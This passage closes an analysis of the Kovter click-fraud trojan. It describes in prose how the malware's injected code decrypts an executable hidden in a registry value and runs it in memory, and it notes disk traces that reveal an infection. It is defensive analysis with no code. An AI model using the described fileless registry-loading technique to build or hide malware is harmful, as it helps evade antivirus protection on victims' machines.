The machine code of the thread created by Kovter performs the following operations:
  • retrieves the addresses of the APIs LoadLibrary, GetProcAddress, VirtualAlloc, RegOpenKeyEx and RegQueryValueEx
  • reads the registry value HKCU\software\hpkxvramhp [jpmyhhqq] into a memory buffer allocated with VirtualAlloc
  • the contents of HKCU\software\hpkxvramhp [jpmyhhqq] are encrypted; after decrypting them, it checks whether the content is an executable file (MZ)
  • after a series of operations that rebuild the executable file in memory, it runs its code by calling its entry point

Final thoughts

Kovter is a click-fraud trojan that uses several layers of obfuscation (JavaScript, PowerShell, machine code) together with "fileless" techniques, so as not to be intercepted by the antivirus disk scan. The viral code of Kovter is kept in the Windows registry, in a randomly named key under HKCU\Software.

This malware does leave some traces on the disk: the .lnk files used to run it automatically (through the Start menu and the registry key HKCU\..\Run). Moreover, reading the registry key HKCU\..\Run with Regedit produces an error, which can alert the user to the presence of this malware.
 

Author: Engineer Gianfranco Tonello
